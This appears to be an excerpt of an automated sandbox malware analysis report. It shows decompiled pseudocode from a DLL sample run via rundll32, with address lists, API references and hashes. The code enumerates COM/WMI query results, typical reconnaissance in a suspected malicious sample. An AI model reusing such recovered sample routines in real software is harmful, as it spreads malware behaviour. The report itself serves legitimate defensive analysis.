                                                                                                                                                                                                                                                                            					return _v40.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t5 = 9;
                                                                                                                                                                                                                                                                            					return _t5;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x1000b96f
                                                                                                                                                                                                                                                                            0x1000b97a
                                                                                                                                                                                                                                                                            0x1000b985
                                                                                                                                                                                                                                                                            0x1000b971
                                                                                                                                                                                                                                                                            0x1000b973
                                                                                                                                                                                                                                                                            0x1000b975
                                                                                                                                                                                                                                                                            0x1000b975

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,1000BE52,?,?,00000000), ref: 1000B97A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                                                                                                                                            • Opcode ID: 767d4d8b320d70d3546e6dadcfa05ce5210f431b328cf14a8369f91b60a3ea89
                                                                                                                                                                                                                                                                            • Instruction ID: 0ea09056568cddae72f6db05d408285a1f01a126f74f09a3d9f776612afef0c3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 767d4d8b320d70d3546e6dadcfa05ce5210f431b328cf14a8369f91b60a3ea89
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECC0C031A0020D46DF00DFB167466EE33FC4B082C8F100050EE03F00C5E960DD804370
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                                                            			E1000D7CB(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				char* _v72;
                                                                                                                                                                                                                                                                            				signed short _v80;
                                                                                                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                                                                                                            				char _v88;
                                                                                                                                                                                                                                                                            				char _v92;
                                                                                                                                                                                                                                                                            				char _v96;
                                                                                                                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                                                                                                                            				char _v104;
                                                                                                                                                                                                                                                                            				char _v616;
                                                                                                                                                                                                                                                                            				intOrPtr* _t159;
                                                                                                                                                                                                                                                                            				char _t165;
                                                                                                                                                                                                                                                                            				signed int _t166;
                                                                                                                                                                                                                                                                            				signed int _t173;
                                                                                                                                                                                                                                                                            				signed int _t178;
                                                                                                                                                                                                                                                                            				signed int _t186;
                                                                                                                                                                                                                                                                            				intOrPtr* _t187;
                                                                                                                                                                                                                                                                            				signed int _t188;
                                                                                                                                                                                                                                                                            				signed int _t192;
                                                                                                                                                                                                                                                                            				intOrPtr* _t193;
                                                                                                                                                                                                                                                                            				intOrPtr _t200;
                                                                                                                                                                                                                                                                            				intOrPtr* _t205;
                                                                                                                                                                                                                                                                            				signed int _t207;
                                                                                                                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                                                                                                                            				intOrPtr* _t210;
                                                                                                                                                                                                                                                                            				intOrPtr _t212;
                                                                                                                                                                                                                                                                            				intOrPtr* _t213;
                                                                                                                                                                                                                                                                            				signed int _t214;
                                                                                                                                                                                                                                                                            				char _t217;
                                                                                                                                                                                                                                                                            				signed int _t218;
                                                                                                                                                                                                                                                                            				signed int _t219;
                                                                                                                                                                                                                                                                            				signed int _t230;
                                                                                                                                                                                                                                                                            				signed int _t235;
                                                                                                                                                                                                                                                                            				signed int _t242;
                                                                                                                                                                                                                                                                            				signed int _t243;
                                                                                                                                                                                                                                                                            				signed int _t244;
                                                                                                                                                                                                                                                                            				signed int _t245;
                                                                                                                                                                                                                                                                            				intOrPtr* _t247;
                                                                                                                                                                                                                                                                            				intOrPtr* _t251;
                                                                                                                                                                                                                                                                            				signed int _t252;
                                                                                                                                                                                                                                                                            				intOrPtr* _t253;
                                                                                                                                                                                                                                                                            				void* _t255;
                                                                                                                                                                                                                                                                            				intOrPtr* _t261;
                                                                                                                                                                                                                                                                            				signed int _t262;
                                                                                                                                                                                                                                                                            				signed int _t283;
                                                                                                                                                                                                                                                                            				signed int _t289;
                                                                                                                                                                                                                                                                            				char* _t298;
                                                                                                                                                                                                                                                                            				void* _t320;
                                                                                                                                                                                                                                                                            				signed int _t322;
                                                                                                                                                                                                                                                                            				intOrPtr* _t323;
                                                                                                                                                                                                                                                                            				intOrPtr _t324;
                                                                                                                                                                                                                                                                            				signed int _t327;
                                                                                                                                                                                                                                                                            				intOrPtr* _t328;
                                                                                                                                                                                                                                                                            				intOrPtr* _t329;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                                                                                            				_v60 = _v60 & 0x00000000;
                                                                                                                                                                                                                                                                            				_v56 = __edx;
                                                                                                                                                                                                                                                                            				_v100 = __ecx;
                                                                                                                                                                                                                                                                            				_t159 = E1000D2F7(__ecx);
                                                                                                                                                                                                                                                                            				_t251 = _t159;
                                                                                                                                                                                                                                                                            				_v104 = _t251;
                                                                                                                                                                                                                                                                            				if(_t251 == 0) {
                                                                                                                                                                                                                                                                            					return _t159;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t320 = E100091E7(0x10);
                                                                                                                                                                                                                                                                            				_v36 = _t320;
                                                                                                                                                                                                                                                                            				_pop(_t255);
                                                                                                                                                                                                                                                                            				if(_t320 == 0) {
                                                                                                                                                                                                                                                                            					L53:
                                                                                                                                                                                                                                                                            					E10009203( &_v60, 0xfffffffe);
                                                                                                                                                                                                                                                                            					E1000D3AB( &_v104);
                                                                                                                                                                                                                                                                            					return _t320;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t165 = E100091B2(_t255, 0x101c);
                                                                                                                                                                                                                                                                            				 *_t328 = 0xa18;
                                                                                                                                                                                                                                                                            				_v52 = _t165;
                                                                                                                                                                                                                                                                            				_t166 = E100091B2(_t255);
                                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                                            				_push(_v56);
                                                                                                                                                                                                                                                                            				_v20 = _t166;
                                                                                                                                                                                                                                                                            				_push(_t166);
                                                                                                                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                                                                                                                            				_t322 = E100099EC(_t165);
                                                                                                                                                                                                                                                                            				_v60 = _t322;
                                                                                                                                                                                                                                                                            				E10009E2E( &_v52);
                                                                                                                                                                                                                                                                            				E10009E2E( &_v20);
                                                                                                                                                                                                                                                                            				_t329 = _t328 + 0x20;
                                                                                                                                                                                                                                                                            				if(_t322 != 0) {
                                                                                                                                                                                                                                                                            					_t323 = __imp__#2;
                                                                                                                                                                                                                                                                            					_v40 =  *_t323(_t322);
                                                                                                                                                                                                                                                                            					_t173 = E100091B2(_t255, 0x10b4);
                                                                                                                                                                                                                                                                            					_v20 = _t173;
                                                                                                                                                                                                                                                                            					_v52 =  *_t323(_t173);
                                                                                                                                                                                                                                                                            					E10009E2E( &_v20);
                                                                                                                                                                                                                                                                            					_t324 = _v40;
                                                                                                                                                                                                                                                                            					_t261 =  *_t251;
                                                                                                                                                                                                                                                                            					_t252 = 0;
                                                                                                                                                                                                                                                                            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                                                                                                                            					__eflags = _t178;
                                                                                                                                                                                                                                                                            					if(_t178 != 0) {
                                                                                                                                                                                                                                                                            						L52:
                                                                                                                                                                                                                                                                            						__imp__#6(_t324);
                                                                                                                                                                                                                                                                            						__imp__#6(_v52);
                                                                                                                                                                                                                                                                            						goto L53;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t262 = _v32;
                                                                                                                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                                            					__eflags = _t262;
                                                                                                                                                                                                                                                                            					if(_t262 == 0) {
                                                                                                                                                                                                                                                                            						L49:
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                                                                                                                            						__eflags = _t252;
                                                                                                                                                                                                                                                                            						if(_t252 == 0) {
                                                                                                                                                                                                                                                                            							E10009203( &_v36, 0);
                                                                                                                                                                                                                                                                            							_t320 = _v36;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *(_t320 + 8) = _t252;
                                                                                                                                                                                                                                                                            							 *_t320 = E1000984F(_v100);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t320 + 4)) = E1000984F(_v56);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L52;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                                            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                                                                                                                            						__eflags = _t186;
                                                                                                                                                                                                                                                                            						if(_t186 != 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                                            						_v48 = 0;
                                                                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						__eflags = _v84;
                                                                                                                                                                                                                                                                            						if(_v84 == 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t187 = _v28;
                                                                                                                                                                                                                                                                            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                                                                                                                            						__eflags = _t188;
                                                                                                                                                                                                                                                                            						if(_t188 >= 0) {
                                                                                                                                                                                                                                                                            							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                                                                                                                            							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                                                                                                                            							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                                                                                            							_t253 = _t46;
                                                                                                                                                                                                                                                                            							_t327 = _t252 << 3;
                                                                                                                                                                                                                                                                            							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                                                                                                                            							_t192 = E10009281(_t327, _t47);
                                                                                                                                                                                                                                                                            							__eflags = _t192;
                                                                                                                                                                                                                                                                            							if(_t192 == 0) {
                                                                                                                                                                                                                                                                            								__imp__#16(_v24);
                                                                                                                                                                                                                                                                            								_t193 = _v28;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                                                            								_t252 = _v20;
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100091E7( *(_t327 +  *_t253) << 3);
                                                                                                                                                                                                                                                                            							_t200 =  *_t253;
                                                                                                                                                                                                                                                                            							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                                                                                                                            							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                                                                                                                            								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                                                                                            								E10009203(_t136, 0);
                                                                                                                                                                                                                                                                            								E10009203( &_v36, 0);
                                                                                                                                                                                                                                                                            								__imp__#16(_v24);
                                                                                                                                                                                                                                                                            								_t205 = _v28;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                                                                                                                            								_t320 = _v36;
                                                                                                                                                                                                                                                                            								goto L46;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t207 = _v16;
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								_v12 = _t207;
                                                                                                                                                                                                                                                                            								__eflags = _t207 - _v48;
                                                                                                                                                                                                                                                                            								if(_t207 > _v48) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                                                                                            								_t209 =  &_v12;
                                                                                                                                                                                                                                                                            								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                                                                                                                            								__eflags = _t209;
                                                                                                                                                                                                                                                                            								if(_t209 < 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t212 = E1000984F(_v44);
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                                                                                                                            								_t213 = _v28;
                                                                                                                                                                                                                                                                            								_t281 =  *_t213;
                                                                                                                                                                                                                                                                            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                                                                                                                            								__eflags = _t214;
                                                                                                                                                                                                                                                                            								if(_t214 < 0) {
                                                                                                                                                                                                                                                                            									L39:
                                                                                                                                                                                                                                                                            									__imp__#6(_v44);
                                                                                                                                                                                                                                                                            									_t207 = _v12 + 1;
                                                                                                                                                                                                                                                                            									__eflags = _t207;
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v92 = E100091B2(_t281, 0xe23);
                                                                                                                                                                                                                                                                            								 *_t329 = 0x375;
                                                                                                                                                                                                                                                                            								_t217 = E100091B2(_t281);
                                                                                                                                                                                                                                                                            								_t283 = _v80;
                                                                                                                                                                                                                                                                            								_v96 = _t217;
                                                                                                                                                                                                                                                                            								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                                                                                                            								__eflags = _t218 - 0xb;
                                                                                                                                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                                                                                                                                            									_t219 = _t218 - 0x10;
                                                                                                                                                                                                                                                                            									__eflags = _t219;
                                                                                                                                                                                                                                                                            									if(_t219 == 0) {
                                                                                                                                                                                                                                                                            										L35:
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100091E7(0x18);
                                                                                                                                                                                                                                                                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                                                                                            										__eflags = _t289;
                                                                                                                                                                                                                                                                            										if(_t289 == 0) {
                                                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                                                            											E10009E2E( &_v92);
                                                                                                                                                                                                                                                                            											E10009E2E( &_v96);
                                                                                                                                                                                                                                                                            											__imp__#9( &_v80);
                                                                                                                                                                                                                                                                            											goto L39;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_push(_v72);
                                                                                                                                                                                                                                                                            										_push(L"%d");
                                                                                                                                                                                                                                                                            										L37:
                                                                                                                                                                                                                                                                            										_push(0xc);
                                                                                                                                                                                                                                                                            										_push(_t289);
                                                                                                                                                                                                                                                                            										E1000C172();
                                                                                                                                                                                                                                                                            										_t329 = _t329 + 0x10;
                                                                                                                                                                                                                                                                            										goto L38;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t230 = _t219 - 1;
                                                                                                                                                                                                                                                                            									__eflags = _t230;
                                                                                                                                                                                                                                                                            									if(_t230 == 0) {
                                                                                                                                                                                                                                                                            										L33:
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100091E7(0x18);
                                                                                                                                                                                                                                                                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                                                                                            										__eflags = _t289;
                                                                                                                                                                                                                                                                            										if(_t289 == 0) {
                                                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_push(_v72);
                                                                                                                                                                                                                                                                            										_push(L"%u");
                                                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t235 = _t230 - 1;
                                                                                                                                                                                                                                                                            									__eflags = _t235;
                                                                                                                                                                                                                                                                            									if(_t235 == 0) {
                                                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags = _t235 == 1;
                                                                                                                                                                                                                                                                            									if(_t235 == 1) {
                                                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									L28:
                                                                                                                                                                                                                                                                            									__eflags = _t283 & 0x00002000;
                                                                                                                                                                                                                                                                            									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                                                                                                                            										_v88 = E100091B2(_t283, 0xedb);
                                                                                                                                                                                                                                                                            										E1000C172( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                                                                                                                            										E10009E2E( &_v88);
                                                                                                                                                                                                                                                                            										_t329 = _t329 + 0x18;
                                                                                                                                                                                                                                                                            										_t298 =  &_v616;
                                                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                                                            										_t242 = E1000984F(_t298);
                                                                                                                                                                                                                                                                            										L32:
                                                                                                                                                                                                                                                                            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                                                                                                                            										goto L38;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t242 = E1000D6AF( &_v80);
                                                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                                            									__eflags = _v72 - 0xffff;
                                                                                                                                                                                                                                                                            									_t298 = L"TRUE";
                                                                                                                                                                                                                                                                            									if(_v72 != 0xffff) {
                                                                                                                                                                                                                                                                            										_t298 = L"FALSE";
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t243 = _t218 - 1;
                                                                                                                                                                                                                                                                            								__eflags = _t243;
                                                                                                                                                                                                                                                                            								if(_t243 == 0) {
                                                                                                                                                                                                                                                                            									goto L38;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t244 = _t243 - 1;
                                                                                                                                                                                                                                                                            								__eflags = _t244;
                                                                                                                                                                                                                                                                            								if(_t244 == 0) {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t245 = _t244 - 1;
                                                                                                                                                                                                                                                                            								__eflags = _t245;
                                                                                                                                                                                                                                                                            								if(_t245 == 0) {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags = _t245 != 5;
                                                                                                                                                                                                                                                                            								if(_t245 != 5) {
                                                                                                                                                                                                                                                                            									goto L28;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t298 = _v72;
                                                                                                                                                                                                                                                                            								goto L31;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__#16(_v24);
                                                                                                                                                                                                                                                                            							_t210 = _v28;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                                                                                                                            							_t252 = _v20;
                                                                                                                                                                                                                                                                            							L42:
                                                                                                                                                                                                                                                                            							_t262 = _v32;
                                                                                                                                                                                                                                                                            							_t252 = _t252 + 1;
                                                                                                                                                                                                                                                                            							_v20 = _t252;
                                                                                                                                                                                                                                                                            							__eflags = _t262;
                                                                                                                                                                                                                                                                            							if(_t262 != 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							L48:
                                                                                                                                                                                                                                                                            							_t324 = _v40;
                                                                                                                                                                                                                                                                            							goto L49;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t247 = _v28;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                                                                                                                            						goto L42;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t262 = _v32;
                                                                                                                                                                                                                                                                            					goto L48;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E10009203( &_v36, _t322);
                                                                                                                                                                                                                                                                            					_t320 = _v36;
                                                                                                                                                                                                                                                                            					goto L53;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





































































                                                                                                                                                                                                                                                                            0x1000d7d4
                                                                                                                                                                                                                                                                            0x1000d7da
                                                                                                                                                                                                                                                                            0x1000d7e1
                                                                                                                                                                                                                                                                            0x1000d7e4
                                                                                                                                                                                                                                                                            0x1000d7e7
                                                                                                                                                                                                                                                                            0x1000d7ec
                                                                                                                                                                                                                                                                            0x1000d7ee
                                                                                                                                                                                                                                                                            0x1000d7f3
                                                                                                                                                                                                                                                                            0x1000dc3b
                                                                                                                                                                                                                                                                            0x1000dc3b
                                                                                                                                                                                                                                                                            0x1000d800
                                                                                                                                                                                                                                                                            0x1000d802
                                                                                                                                                                                                                                                                            0x1000d805
                                                                                                                                                                                                                                                                            0x1000d808
                                                                                                                                                                                                                                                                            0x1000dc20
                                                                                                                                                                                                                                                                            0x1000dc26
                                                                                                                                                                                                                                                                            0x1000dc30
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dc35
                                                                                                                                                                                                                                                                            0x1000d813
                                                                                                                                                                                                                                                                            0x1000d81a
                                                                                                                                                                                                                                                                            0x1000d821
                                                                                                                                                                                                                                                                            0x1000d824
                                                                                                                                                                                                                                                                            0x1000d829
                                                                                                                                                                                                                                                                            0x1000d82b
                                                                                                                                                                                                                                                                            0x1000d82e
                                                                                                                                                                                                                                                                            0x1000d831
                                                                                                                                                                                                                                                                            0x1000d832
                                                                                                                                                                                                                                                                            0x1000d83b
                                                                                                                                                                                                                                                                            0x1000d841
                                                                                                                                                                                                                                                                            0x1000d844
                                                                                                                                                                                                                                                                            0x1000d84d
                                                                                                                                                                                                                                                                            0x1000d852
                                                                                                                                                                                                                                                                            0x1000d857
                                                                                                                                                                                                                                                                            0x1000d86e
                                                                                                                                                                                                                                                                            0x1000d87b
                                                                                                                                                                                                                                                                            0x1000d87e
                                                                                                                                                                                                                                                                            0x1000d885
                                                                                                                                                                                                                                                                            0x1000d88a
                                                                                                                                                                                                                                                                            0x1000d891
                                                                                                                                                                                                                                                                            0x1000d896
                                                                                                                                                                                                                                                                            0x1000d89d
                                                                                                                                                                                                                                                                            0x1000d89f
                                                                                                                                                                                                                                                                            0x1000d8ab
                                                                                                                                                                                                                                                                            0x1000d8ae
                                                                                                                                                                                                                                                                            0x1000d8b0
                                                                                                                                                                                                                                                                            0x1000dc10
                                                                                                                                                                                                                                                                            0x1000dc11
                                                                                                                                                                                                                                                                            0x1000dc1a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dc1a
                                                                                                                                                                                                                                                                            0x1000d8b6
                                                                                                                                                                                                                                                                            0x1000d8b9
                                                                                                                                                                                                                                                                            0x1000d8bc
                                                                                                                                                                                                                                                                            0x1000d8bf
                                                                                                                                                                                                                                                                            0x1000d8c1
                                                                                                                                                                                                                                                                            0x1000dbdc
                                                                                                                                                                                                                                                                            0x1000dbdf
                                                                                                                                                                                                                                                                            0x1000dbe2
                                                                                                                                                                                                                                                                            0x1000dbe4
                                                                                                                                                                                                                                                                            0x1000dc06
                                                                                                                                                                                                                                                                            0x1000dc0b
                                                                                                                                                                                                                                                                            0x1000dbe6
                                                                                                                                                                                                                                                                            0x1000dbe9
                                                                                                                                                                                                                                                                            0x1000dbf4
                                                                                                                                                                                                                                                                            0x1000dbfb
                                                                                                                                                                                                                                                                            0x1000dbfb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d8c7
                                                                                                                                                                                                                                                                            0x1000d8c7
                                                                                                                                                                                                                                                                            0x1000d8d9
                                                                                                                                                                                                                                                                            0x1000d8dc
                                                                                                                                                                                                                                                                            0x1000d8de
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d8e6
                                                                                                                                                                                                                                                                            0x1000d8e9
                                                                                                                                                                                                                                                                            0x1000d8ec
                                                                                                                                                                                                                                                                            0x1000d8ef
                                                                                                                                                                                                                                                                            0x1000d8f2
                                                                                                                                                                                                                                                                            0x1000d8f5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d8fb
                                                                                                                                                                                                                                                                            0x1000d909
                                                                                                                                                                                                                                                                            0x1000d90c
                                                                                                                                                                                                                                                                            0x1000d90e
                                                                                                                                                                                                                                                                            0x1000d927
                                                                                                                                                                                                                                                                            0x1000d936
                                                                                                                                                                                                                                                                            0x1000d93e
                                                                                                                                                                                                                                                                            0x1000d93e
                                                                                                                                                                                                                                                                            0x1000d941
                                                                                                                                                                                                                                                                            0x1000d948
                                                                                                                                                                                                                                                                            0x1000d94c
                                                                                                                                                                                                                                                                            0x1000d952
                                                                                                                                                                                                                                                                            0x1000d954
                                                                                                                                                                                                                                                                            0x1000dbc4
                                                                                                                                                                                                                                                                            0x1000dbca
                                                                                                                                                                                                                                                                            0x1000dbd0
                                                                                                                                                                                                                                                                            0x1000dbd3
                                                                                                                                                                                                                                                                            0x1000dbd3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dbd3
                                                                                                                                                                                                                                                                            0x1000d963
                                                                                                                                                                                                                                                                            0x1000d977
                                                                                                                                                                                                                                                                            0x1000d97b
                                                                                                                                                                                                                                                                            0x1000d97d
                                                                                                                                                                                                                                                                            0x1000d982
                                                                                                                                                                                                                                                                            0x1000db91
                                                                                                                                                                                                                                                                            0x1000db97
                                                                                                                                                                                                                                                                            0x1000dba2
                                                                                                                                                                                                                                                                            0x1000dbad
                                                                                                                                                                                                                                                                            0x1000dbb3
                                                                                                                                                                                                                                                                            0x1000dbb9
                                                                                                                                                                                                                                                                            0x1000dbbc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dbbc
                                                                                                                                                                                                                                                                            0x1000d988
                                                                                                                                                                                                                                                                            0x1000db5f
                                                                                                                                                                                                                                                                            0x1000db5f
                                                                                                                                                                                                                                                                            0x1000db62
                                                                                                                                                                                                                                                                            0x1000db65
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d990
                                                                                                                                                                                                                                                                            0x1000d998
                                                                                                                                                                                                                                                                            0x1000d99f
                                                                                                                                                                                                                                                                            0x1000d9a5
                                                                                                                                                                                                                                                                            0x1000d9a7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d9b0
                                                                                                                                                                                                                                                                            0x1000d9c5
